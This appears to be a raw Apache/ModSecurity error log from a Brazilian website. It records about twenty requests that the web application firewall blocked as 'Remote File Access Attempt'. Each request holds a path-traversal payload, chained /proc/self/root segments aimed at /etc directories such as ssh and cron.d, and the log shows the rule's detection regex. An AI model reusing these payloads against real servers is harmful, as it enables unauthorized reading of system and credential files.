[Mon Mar 16 14:32:58.041060 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.241.46:38584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-ylajLEzk2WiQ-10b6wAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:00.248611 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.241.46:44614] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-y1ajLEzk2WiQ-10b7AAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:01.824628 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:44620] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-zbysWC90G-1nBrBNwwAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:03.235443 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.241.46:44626] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-z_9ocpUE4ed4uDz5EgAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:04.511011 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:44634] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-0FajLEzk2WiQ-10b7gAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:05.887505 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:44636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-0bABkC4fWIHEf8H42wAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:07.095137 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.241.46:44648] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-06TCbgAP5jq5Teg1LwAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:08.392045 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.241.46:42580] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-1KQpVkWug9HeOt8_cgAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:08.730730 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.243.203:48570] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-1KTCbgAP5jq5Teg1MQAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:33:09.627401 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.241.46:42596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-1aQpVkWug9HeOt8_cwAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:10.781125 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:42610] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-1o6lpbStxTqkSkt1uAAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:11.030074 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.243.203:33318] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-11ajLEzk2WiQ-10b8AAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:33:12.316982 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:42616] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-2I6lpbStxTqkSkt1uwAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:13.607572 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:42630] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-2f9ocpUE4ed4uDz5EwAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:14.791073 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:42634] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-2pqj1wV0Si-Okef4NwAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:18.508697 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.241.46:42636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-3I6lpbStxTqkSkt1wAAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:19.823237 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.241.46:50544] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-35qj1wV0Si-Okef4OAAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:21.960290 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:38982] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-4Y6lpbStxTqkSkt1wwAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:33:22.075218 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.241.46:50556] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-4pqj1wV0Si-Okef4PAAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:23.362415 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.241.46:50566] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-41ajLEzk2WiQ-10b8gAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:33:24.569508 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:50580] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-5KQpVkWug9HeOt8_dgAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
